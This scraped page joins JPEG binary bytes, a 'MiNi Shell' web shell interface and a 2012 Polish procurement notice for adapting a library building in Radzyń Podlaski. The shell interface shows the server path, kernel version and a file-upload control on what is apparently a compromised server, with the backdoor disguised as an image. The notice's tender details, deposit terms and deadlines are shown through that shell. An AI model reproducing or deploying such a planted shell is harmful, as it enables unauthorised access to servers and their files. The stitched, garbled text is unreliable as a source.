JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120330/99484-N-2012.html

<p class="kh_header"><b>Radzyń Podlaski: Adaptacja budynku - Miejska Biblioteka Publiczna w Radzyniu Podlaskim</b><br>
<b>Numer ogłoszenia: 99484 - 2012; data zamieszczenia: 30.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Radzyń Podlaski , ul. Warszawska 32, 21-300 Radzyń Podlaski, woj. lubelskie, tel. 83 3528070, faks 83 3528085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umradzynpodlaski.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku - Miejska Biblioteka Publiczna w Radzyniu Podlaskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przebudowę i rozbudowę istniejącego budynku przy ul. Armii Krajowej 5 na potrzeby Miejskiej Biblioteki Publicznej w Radzyniu Podlaskim,  zgodnie z poniższym wyszczególnieniem: 
I) I etap - zakres do wykonania w 2012r.:
   1) BRANŻA OGÓLNOBUDOWLANA:
        - roboty w zakresie burzenia,
        - roboty ziemne,
        - konstrukcje żelbetowe,
        - roboty murarskie,
        - wykonywanie pokryć dachowych,
        - obróbki blacharskie,
        - instalowanie ram drzwiowych i okiennych,
        - kładzenie podłóg,
II etap - zakres do wykonania 2013r.
  2) BRANŻA OGÓLNOBUDOWLANA:
- instalowanie ram drzwiowych i okiennych,
- tynkowanie,
- kładzenie podłóg,
- instalowanie ścianek działowych,
- instalowanie sufitów podwieszanych,
- kładzenie płytek,
- roboty malarskie,
- instalowanie wyrobów metalowych,
- elewacja,
- docieplenie cokołów,
- roboty w zakresie kształtowania terenu,
- instalowanie wind,
- wyposażenie,
3) BRANŻA SANITARNA:
- przyłącze kanalizacji sanitarnej,
- przyłącze kanalizacji wodociągowej, 
- instalacja wentylacji mechanicznej,
- instalacja chłodzenia (klimatyzacji),
- instalacja wod-kan,
- instalacja co i ciepła technologicznego,
- przyłącze sieci cieplnej,

4) BRANŻA ENERGETYCZNA:
- prace demontażowe
- tablice rozdzielcze,
- WLZ-ty zasilające tablice rozdzielcze,
- instalacje oświetleniowe gniazd wtykowych oraz połączeń 
  wyrównawczych,
- instalacja odgromowa, uziom otokowy,
- budowa przyłącza elektroenergetycznego,

5) BRANŻA TELETECHNICZNA:
- instalacja logiczna - okablowanie strukturalne,
- instalacja logiczna - punkty przyłączeniowe,
- instalacja logiczna - przewody, koryta i rury ochronne,
- instalacja systemu włamania i napadu - SSWIN i urządzenia SSWIN,
- punkty przyłączeniowe, przewody sterownicze,
- badania i pomiary

Opis przedmiotu zamówienia zawiera załączniki nr 1 - OPIS PRZEDMIOTU 
ZAMÓWIENIA do Specyfikacji Istotnych Warunków Zamówienia z dnia 30 marca 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 15 000,00 zł, słownie złotych: 
piętnaście tysięcy 00/100.
Wadium może być wniesione w: 
     1) pieniądzu;
     2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy    
         oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze 
         poręczeniem pieniężnym;
     3) gwarancjach bankowych;
     4) gwarancjach ubezpieczeniowych;
     5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt 
    2 ustawy z dnia 9 listopada  2000 r. o utworzeniu polskiej Agencji Rozwoju
    Przedsiębiorczości ( Dz. U. z 2007r. Nr 42, poz. 275,  z późn. zm. ).

Wadium należy wnieść najpóźniej w terminie składania ofert, tj. do dnia  
17 kwietnia 2012r. do godz. 10:00.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy    
Urzędu Miasta Radzyń Podlaski nr 56 8046 0002 2001 0000 0446 0001 w Banku 
Spółdzielczym w Radzyniu Podlaskim.
W przypadku wnoszenia wadium w pieniądzu, termin wniesienia wadium będzie 
uznany za zachowany tylko wtedy, gdy uznanie rachunku bankowego 
zamawiającego nastąpi przed upływem terminu składania ofert. 
Dowód wniesienia wadium wykonawca jest zobowiązany dołączyć do oferty. W 
przypadku wniesienia wadium w innej formie niż pieniężna obowiązuje dołączenie 
do oferty oryginału dokumentu. Dowód wniesienia wadium stanowi załącznik 
oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia wymaga
    się, ażeby wykonawca dysponował osobami posiadającymi uprawnienia  
    budowlane do kierowania robotami budowlanymi, zgodnie z przepisami
    ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz.
    1623, z późn. zm.), w specjalności:
     -  konstrukcyjno - budowlanej - bez ograniczeń,
     -  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych - bez
        ograniczeń,
     -  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych - bez 
        ograniczeń,
    -  instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych - bez 
       ograniczeń,
     -  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
       i elektroenergetycznych - bez ograniczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści 
    oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku  
    wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z 
    uwzględnieniem podanych warunków ich wprowadzenia:
    1) zmiana terminu realizacji umowy:
        a) wstrzymania realizacji umowy przez zamawiającego, 
        b) konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich, w tym grup 
            społecznych lub zawodowych nie artykułowanych lub nie możliwych do 
            jednoznacznego określenia w chwili zawierania umowy, 
     2) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy 
          zgodnie ze SIWZ,
     3) zmiana obowiązującej stawki VAT.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w  pkt 1
    termin wykonania umowy może ulec odpowiednio wydłużeniu o czas niezbędny 
    do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak 
    niż o okres trwania tych okoliczności.

   Wystąpienie okoliczności, o której mowa w  pkt 2, może być przesłanką do  
      wydłużenia terminu wykonania przedmiotu umowy o czas niezbędny do 
      zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak   
      niż o okres trwania tej okoliczności. Jeżeli okoliczność ta powoduje trwałą 
      niemożliwość realizacji umowy - umowa może być rozwiązana.

 Zmiana stawki VAT, o której mowa w pkt 3, powodująca zwiększenie 
 kosztów wykonania umowy po stronie wykonawcy, może być przesłanką do 
 zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku 
 zapłaconego przez wykonawcę, powodująca zmniejszenie kosztów - 
 zmniejszenia wynagrodzenia o taką kwotę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umradzynpodlaski.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia (SIWZ) można uzyskać nieodpłatnie  w Urzędzie Miasta Radzyń Podlaski, 21 - 300 Radzyń Podlaski, ul. Warszawska 32, pok. 102, w godz. 7:30 - 15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2012 godzina 10:00, miejsce: Oferty należy składać w Sekretariacie Urzędu Miasta Radzyń Podlaski, 21 - 300 Radzyń Podlaski, ul. Warszawska 32.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com